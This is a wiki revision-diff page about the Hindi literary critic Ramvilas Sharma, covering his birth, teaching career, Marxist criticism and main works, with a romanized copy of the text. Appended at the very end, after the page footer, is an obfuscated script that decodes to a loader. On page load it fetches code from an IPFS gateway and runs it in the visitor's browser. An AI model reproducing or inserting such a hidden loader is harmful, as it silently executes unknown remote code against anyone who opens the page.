Difference between revisions of "रामविलास शर्मा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''डॉ. रामविलास शर्मा''' (जन्म- 10 अक्टूबर, 1912, उचगाँव सा...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
'''डॉ. रामविलास शर्मा''' (जन्म- [[10 अक्टूबर]], [[1912]], उचगाँव सानी, [[उन्नाव ज़िला]], [[उत्तर प्रदेश]] मृत्यु- [[30 मई]], [[2000]], [[भारत]]) आधुनिक हिन्दी साहित्य में सुप्रसिद्ध आलोचक, निबंधकार, विचारक एवं कवि थे।
 
'''डॉ. रामविलास शर्मा''' (जन्म- [[10 अक्टूबर]], [[1912]], उचगाँव सानी, [[उन्नाव ज़िला]], [[उत्तर प्रदेश]] मृत्यु- [[30 मई]], [[2000]], [[भारत]]) आधुनिक हिन्दी साहित्य में सुप्रसिद्ध आलोचक, निबंधकार, विचारक एवं कवि थे।
 
==जीवन परिचय==
 
==जीवन परिचय==
रामविलास शर्मा [[हिन्दी]] में प्रगतिवादी समीक्षा-पद्धति के एक प्रमुख स्तम्भ थे। रामविलास शर्मा का जन्म 10 अक्टूबर, 1912 ई. में उत्तर प्रदेश के उन्नाव ज़िले में उच्चगाँव सानी में हुआ था। सन 1971 ई. में इन्होंने कन्हैयालाल माणिक मुंशी हिन्दी विद्यापीठ में अध्यापन प्रारम्भ किया। इसके पूर्व आगरा के ही बलवंत राजपूत कॉलेज में शर्मा जी [[अंग्रेज़ी भाषा|अंग्रेज़ी]] के प्राध्यापक रहे। इन्होंने अपने उग्र और उत्तेजनापूर्ण निबन्धों से हिन्दी समीक्षा को एक गति प्रदान की है। इन्होंने सम्पूर्ण साहित्य नये और पुराने को मार्क्सवादी दृष्टिकोण से देखने-परखने का प्रस्ताव बड़ी क्षमता के साथ किया है। शर्मा जी ने सैद्धान्तिक और व्यावहारिक दोनों समीक्षा-पद्धतियों से अपने विचारों को पुष्ट करने का यत्न किया है। 'समालोचक' नामक एक पत्र भी इनका प्रकाशित हुआ। शर्मा जी की समीक्षा कृतियों में विशेष उल्लेखनीय हैं-
+
रामविलास शर्मा [[हिन्दी]] में प्रगतिवादी समीक्षा-पद्धति के एक प्रमुख स्तम्भ थे। रामविलास शर्मा का जन्म 10 अक्टूबर, 1912 ई. में उत्तर प्रदेश के उन्नाव ज़िले में उच्चगाँव सानी में हुआ था। सन 1971 ई. में इन्होंने कन्हैयालाल माणिक मुंशी हिन्दी विद्यापीठ में अध्यापन प्रारम्भ किया। इसके पूर्व आगरा के ही बलवंत राजपूत कॉलेज में शर्मा जी [[अंग्रेज़ी भाषा|अंग्रेज़ी]] के प्राध्यापक रहे। इन्होंने अपने उग्र और उत्तेजनापूर्ण निबन्धों से हिन्दी समीक्षा को एक गति प्रदान की है। इन्होंने सम्पूर्ण साहित्य नये और पुराने को मार्क्सवादी दृष्टिकोण से देखने-परखने का प्रस्ताव बड़ी क्षमता के साथ किया है। शर्मा जी ने सैद्धान्तिक और व्यावहारिक दोनों समीक्षा-पद्धतियों से अपने विचारों को पुष्ट करने का यत्न किया है। 'समालोचक' नामक एक पत्र भी इनका प्रकाशित हुआ।  
 +
==कृतियाँ==
 +
शर्मा जी की समीक्षा कृतियों में विशेष उल्लेखनीय हैं-
 
*'प्रेमचन्द और उनका युग' ([[1953]])  
 
*'प्रेमचन्द और उनका युग' ([[1953]])  
 
*'निराला' ([[1946]] ई.)  
 
*'निराला' ([[1946]] ई.)  

Revision as of 12:19, 2 January 2011

d aau. ramavilas sharma (janm- 10 aktoobar, 1912, uchagaanv sani, unnav zila, uttar pradesh mrityu- 30 mee, 2000, bharat) adhunik hindi sahity mean suprasiddh alochak, nibandhakar, vicharak evan kavi the.

jivan parichay

ramavilas sharma hindi mean pragativadi samiksha-paddhati ke ek pramukh stambh the. ramavilas sharma ka janm 10 aktoobar, 1912 ee. mean uttar pradesh ke unnav zile mean uchchagaanv sani mean hua tha. san 1971 ee. mean inhoanne kanhaiyalal manik muanshi hindi vidyapith mean adhyapan prarambh kiya. isake poorv agara ke hi balavant rajapoot k aaulej mean sharma ji aangrezi ke pradhyapak rahe. inhoanne apane ugr aur uttejanapoorn nibandhoan se hindi samiksha ko ek gati pradan ki hai. inhoanne sampoorn sahity naye aur purane ko marksavadi drishtikon se dekhane-parakhane ka prastav b di kshamata ke sath kiya hai. sharma ji ne saiddhantik aur vyavaharik donoan samiksha-paddhatiyoan se apane vicharoan ko pusht karane ka yatn kiya hai. 'samalochak' namak ek patr bhi inaka prakashit hua.

kritiyaan

sharma ji ki samiksha kritiyoan mean vishesh ullekhaniy haian-

  • 'premachand aur unaka yug' (1953)
  • 'nirala' (1946 ee.)
  • 'bharatendu harishchandr', 'pragati aur parampara', 'bhasha sahity aur sanskriti' (1954 ee.)
  • 'bhasha aur samaj' (1961 ee.)
  • 'nirala ki sahity sadhana' (1969)

ramavilas sharma ne yadyapi kavitaean adhik nahian likhian, par hindi ke prayogavadi kavy-andolan ke sath ve ghanishth roop se sambaddh rahe haian. 'ajney' dvara sampadit 'tarasaptak' (1943 ee.) ke ek kavi roop mean inaki rachanaean kafi charchit huee haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>